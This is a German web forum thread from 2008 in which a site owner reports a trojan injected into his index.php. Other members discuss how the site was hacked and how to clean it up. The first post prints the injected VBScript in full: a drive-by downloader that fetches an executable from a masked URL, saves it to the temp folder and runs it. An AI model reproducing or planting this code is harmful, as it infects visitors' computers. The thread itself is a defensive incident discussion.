|
| spacefun |
Geschrieben am: Do 28.02.2008, 13:54
|
![]() AyomRank 5 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() Gruppe: Member (aktiv) Beiträge: 260 Mitglied seit: 24.01.2004 |
Hallo
Routinemässig überprüfte ich meine Website auf Validation und enddeckte 5 Fehler die nur ein paar Tage alt sein konnten. Ich begann den Fehler zu suchen und fand ein Virus in der index.php Als ich die index.php herunterladen wollte schlug mein Virenscaner Alarm. Laut Virenscanner ist es ein: HTML/Rce.Gen - Malware Name: HTML/Rce.Gen Entdeckt am: 14/08/2007 Art: Trojan In freier Wildbahn: Ja Gemeldete Infektionen: Niedrig Verbreitungspotenzial: Niedrig Schadenspotenzial: Niedrig Statische Datei: Nein Engine Version: 7.04.01.62 Unten in rot die Malware: ?><script language="VBscript"> On Error Resume Next url = "******.exe" Set xml = document.createElement("object") xml.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36" Set HTP = xml.CreateObject("Microsoft.XMLHTTP", "") S1 = "Ad" S2 = "od" S3 = "b." S4 = "ST" S5 = "re" S6 = "am" Set AdbS = xml.CreateObject(S1 & S2 & S3 & S4 & S5 & S6, "") AdbS.Type = 1 HTP.open "GET", url, False HTP.Send Set FSO = xml.CreateObject("Scripting.FileSystemObject", "") Set tmp = FSO.GetSpecialFolder(2) FileName = FSO.GetFileName(url) FileName = FSO.BuildPath(tmp, FileName) AdbS.open AdbS.write HTP.responseBody AdbS.SaveToFile FileName, 2 AdbS.Close Set WSH = xml.CreateObject("Shell.Application", "") WSH.ShellExecute FileName, "", "", "open", 1 </Script> Ich habe jetzt alle Passwörter geändert. Ich hoffe das reicht. Seit also vorsichtig und checkt eure Webseiten ab und zu. Gruss space |
![]() |
| msolt |
#2 Geschrieben am: Do 28.02.2008, 14:13 (+00:18)
|
|
AyomRank 4 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() Gruppe: Member (aktiv) Beiträge: 122 Mitglied seit: 30.04.2005 |
Danke für den Hinweis.
Benutzt du ein OpenSource CMS oder hast du was selbst geschrieben? |
![]() |
| sd12 |
#3 Geschrieben am: Do 28.02.2008, 14:25 (+00:12)
|
![]() AyomRank 9 Gruppe: Moderatoren Beiträge: 3580 Mitglied seit: 3.03.2004 |
Gib mal die URL her...
Es ist davon auszugehen, dass die Index.php über ein Sicherheitsloch verändert wurde. -------------------- ************************
Treiber f[r das Kezboard ist [berfl[ssig. |
![]() |
| spacefun |
#4 Geschrieben am: Do 28.02.2008, 14:29 (+00:03)
|
![]() AyomRank 5 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() Gruppe: Member (aktiv) Beiträge: 260 Mitglied seit: 24.01.2004 |
Hallo
Es handelt sich um ein sehr gutes, stabiles und auch sicheres CMS. Ich habe es dem Sicherheitsteam schon gemeldet und die schauen es sich näher an. Allerdings laufen unter demselben Space noch weitere Scripte und so kann ich nicht mit Sicherheit sagen, wo das Leck liegt. Auf jeden Fall lösche ich alle Dateien und und installiere eine Sicherungskopie die ich durch den Virenscanner geprüft habe. Das überprüfen der Dateien ist einfach. Alles per FTP herunterladen und dann schlägt der Virenscanner des PCs Alarm, falls eine Datei verseucht ist. Gruss space |
![]() |
| sd12 |
#5 Geschrieben am: Do 28.02.2008, 15:17 (+00:48)
|
![]() AyomRank 9 Gruppe: Moderatoren Beiträge: 3580 Mitglied seit: 3.03.2004 |
Das bringt Dir nix...
Kleines BEispiel. Der Schadcode wird via JS von einem anderen Webspace nachgeladen somit ist Deine Website für den Virenscanner sauber. -------------------- ************************
Treiber f[r das Kezboard ist [berfl[ssig. |
![]() |
| spacefun |
#6 Geschrieben am: Do 28.02.2008, 15:21 (+00:04)
|
![]() AyomRank 5 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() Gruppe: Member (aktiv) Beiträge: 260 Mitglied seit: 24.01.2004 |
Hallo SD
Ich denke das geht schon. Ich lösche ja die ganze Webpräsenz und lade nur geprüfte Dateien hoch. Da kann danach kein Code mehr versteckt sein. Gruss space |
![]() |
| Flipper Felgenspezi2000 |
#7 Geschrieben am: Do 28.02.2008, 15:22 (+00:00)
|
|
AyomRank 4 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() Gruppe: Member (aktiv) Beiträge: 53 Mitglied seit: 29.07.2007 |
Ein sehr gutes Gegenmittel dagegen ist das kostenlose Script "CrawlTrack". Es wird einfach per FTP auf den Server geladen und durch eine einfache Zeile in der index.php im Rootverzeichnis aktiviert.
Hervorragend ist auch die Analyse zur Indexierung Deiner Seite von Suchmaschinenbots. Das Script erhälst Du hier: http://www.crawltrack.fr/ Bin für jede Frage hierzu offen. Ich nutze es in Verbindung mit Joomla seit einer Woche nach einem fiesen Hack und habe bereits erfolgreich über 100 diverse Hackversuche abgewehrt ;-) Gruss -------------------- |
![]() |
| sd12 |
#8 Geschrieben am: Do 28.02.2008, 15:23 (+00:01)
|
![]() AyomRank 9 Gruppe: Moderatoren Beiträge: 3580 Mitglied seit: 3.03.2004 |
Aber an einem include eines externen JS ist nix zu erkennen...
-------------------- ************************
Treiber f[r das Kezboard ist [berfl[ssig. |
![]() |
| spacefun |
#9 Geschrieben am: Do 28.02.2008, 15:25 (+00:01)
|
![]() AyomRank 5 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() Gruppe: Member (aktiv) Beiträge: 260 Mitglied seit: 24.01.2004 |
Hallo Flipper
Super Idee! Das probiere ich gleich aus. space |
![]() |
| spacefun |
#10 Geschrieben am: Do 28.02.2008, 15:36 (+00:10)
|
![]() AyomRank 5 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() Gruppe: Member (aktiv) Beiträge: 260 Mitglied seit: 24.01.2004 |
Hallo SD
Ich probiere mal den Tip von Flipper aus und installiere die diversen Scripts neu. Da warten ein paar Stunden Arbeit gruss space |
![]() |
| deetee |
#11 Geschrieben am: Do 28.02.2008, 16:06 (+00:30)
|
|
AyomRank 4 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() Gruppe: Member (aktiv) Beiträge: 80 Mitglied seit: 11.12.2004 |
@sd12
Woran erkennst du, dass JavaScript im Spiel ist? |
![]() |
| sd12 |
#12 Geschrieben am: Do 28.02.2008, 16:30 (+00:23)
|
![]() AyomRank 9 Gruppe: Moderatoren Beiträge: 3580 Mitglied seit: 3.03.2004 |
Nein, ich erkenne das nicht, aber es könnte auf IRGENDEINER anderen Seite z.B. Schadhafter Code via Javascript nachgeladen werden....
-------------------- ************************
Treiber f[r das Kezboard ist [berfl[ssig. |
![]() |
| spacefun |
#13 Geschrieben am: Do 28.02.2008, 16:43 (+00:12)
|
![]() AyomRank 5 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() Gruppe: Member (aktiv) Beiträge: 260 Mitglied seit: 24.01.2004 |
Das betrübliche am Ganzen ist, das ich nur durch die Fehler im XHTML darauf gestossen bin.
Würde ich nicht so stark auf Validierung von HTML und CSS achten, wäre mir das nie aufgefallen. Gruss space |
![]() |
| jAuer Jürgen Auer - freiberufl. Programmierer |
#14 Geschrieben am: Do 28.02.2008, 16:50 (+00:07)
|
||
|
AyomRank 9 Gruppe: Experten Entwicklung Beiträge: 2313 Mitglied seit: 4.02.2006 |
Das ist völlig irrelevant. Eines der vorhandenen Scripte hat diese Lücke ermöglicht. Solange das drauf bleibt, kann das Sekunden nach dem Aufspielen erneut gehackt werden. Sprich: Download, Offline-Überprüfung und Hochladen ist bloß Beschäftigungstherapie. Aktuell würde nur helfen, PHP und alle anderen Scripte komplett abzuschalten - bis der Fehler gefunden ist. Auch das Ändern von Passwörtern ist irrelevant. Das ist wahrscheinlich eine Folge des erfolgreichen Hacks - aber nicht das Einfallstor. -------------------- Web-Anwendung 3.0: Ein Online-Kalender für Termine vieler Filialen.
server-daten - die Single-Data-Solution: Web-Datenbanken als Online - CRM - Lösung. Ihre Geschäftsprozesse entscheiden, was Ihre Online-Datenbank macht. Sie konzentrieren sich auf Ihr Kerngeschäft - die Datenbank funktioniert. |
||
![]() |
| spacefun |
#15 Geschrieben am: Do 28.02.2008, 16:58 (+00:07)
|
![]() AyomRank 5 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() Gruppe: Member (aktiv) Beiträge: 260 Mitglied seit: 24.01.2004 |
Hallo jAuer
Das habe ich inzwischen leider auch feststellen müssen Ich lösche deshalb alle bestehenden Scripte und installiere die jeweils neuste Version. Auch wenn das viel Arbeit bedeutet ist dies wohl die beste Lösung. gruss space |
![]() |
| memoriam |
#16 Geschrieben am: Do 28.02.2008, 17:26 (+00:28)
|
![]() AyomRank 5 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() Gruppe: Member (aktiv) Beiträge: 435 Mitglied seit: 30.03.2005 |
Mal für die dicken, kleinen, Doofen: was macht denn das Script überhaupt?
|
![]() |
| marcus-j |
#17 Geschrieben am: Do 28.02.2008, 17:48 (+00:21)
|
|
AyomRank 2 ![]() ![]() ![]() ![]() Gruppe: Member (aktiv) Beiträge: 6 Mitglied seit: 28.02.2008 |
Es ist auch möglich, dass jemand einen Trojaner oder ähnliches spionage Programm
auf einem PC installiert hat, ( Automatisiert ) die Zugangsdaten mitloggt und nun zugriff auf den FTP server besitzt. Dann hat das mit den scripten garnichts zu tun ! |
![]() |
| spacefun |
#18 Geschrieben am: Do 28.02.2008, 20:44 (+02:55)
|
![]() AyomRank 5 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() Gruppe: Member (aktiv) Beiträge: 260 Mitglied seit: 24.01.2004 |
So, jetzt habe ich die Scripts neu installiert und zusätzlich das kleine Script "CrawlTrack". http://www.crawltrack.fr
Der erste Angriff wurde schon abgewehrt und ich werde das Script nun auf all meinen Projekten einsetzen. In der Hoffnung auf Ruhe vor Hackern Gruss space |
![]() |
| spaceman007 |
#19 Geschrieben am: Do 28.02.2008, 20:59 (+00:15)
|
||||||
|
AyomRank 4 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() Gruppe: Member (aktiv) Beiträge: 122 Mitglied seit: 23.03.2005 |
@memoriam
=> Das File "******.exe" wird heruntergeladen
=> File (exe) wird gespeichert
=> File (exe) wird gestartet. Und zwar auf Lokal, auf dem Rechner des Users. Was das exe macht, weiss der Geier. Stell Dir das schlimmste vor, genau das wäre möglich. Ist das gleiche wie wenn du einen Doppelklick auf eine .exe machst. Sofern die Sicherheitseinstellungen Deines Browsers und Systemes nicht allzu hoch sind, kann das exe fast alles ausführen. Gruss Spaceman007 -------------------- think-> google -> post
http://www.buechergestell.ch http://www.pickup-artists.ch http://www.web24.ch Die neue Schweizer Suchmaschine! |
||||||
![]() |
| sd12 |
#20 Geschrieben am: Fr 29.02.2008, 00:27 (+03:27)
|
||
![]() AyomRank 9 Gruppe: Moderatoren Beiträge: 3580 Mitglied seit: 3.03.2004 |
Das wollte ich Dir vor ein paar Stunden erklären :-) -------------------- ************************
Treiber f[r das Kezboard ist [berfl[ssig. |
||
![]() |
Thema wird von 0 Benutzer(n) gelesen (0 Gäste und 0 anonyme Benutzer)
0 Mitglieder:
Trackback-Url: http://www.ayom.com/track/t/23188
Seiten: (2) [1] 2 |
![]() ![]() ![]() |
| Themen Titel | Autor | Views | Antworten | Letzte Aktion |
| Kaufen ein deutsche Website/Domain oder Text Link | günter31 | 285 | 6 | Fr 10.10.2008, 09:21 |
| Mobile Website - Tools | rabby | 63 | 0 | Mo 6.10.2008, 23:07 |
| website | lockept93 | 354 | 16 | Fr 3.10.2008, 05:46 |
| Sehr starke und alte Website sucht Linkpartner | ninjas.de | 286 | 2 | Di 30.09.2008, 14:43 |
| [B] Linkbuilding auf Ihre Website zugeschneidert | Sarandella | 100 | 0 | Mo 22.09.2008, 14:07 |
| meine Webseite wurde gehackt und verteilt malware | Blume1 | 477 | 5 | So 21.09.2008, 12:40 |
| Website-Analyse-Tool-Suchen Partner für Vertrieb! | Webspecial | 92 | 0 | Mo 8.09.2008, 17:32 |
| eigene website? | lockept93 | 485 | 27 | Mi 3.09.2008, 16:20 |
| Brauche Code um Werbung auf Website einzubinden | Norbert Hofmann | 269 | 2 | Mo 25.08.2008, 20:58 |
| Schon wieder... | Elite Sites - For every Website! | Sanjo | 250 | 8 | So 24.08.2008, 09:15 |
Anzeige - [Interessiert an einer Anzeige?]



















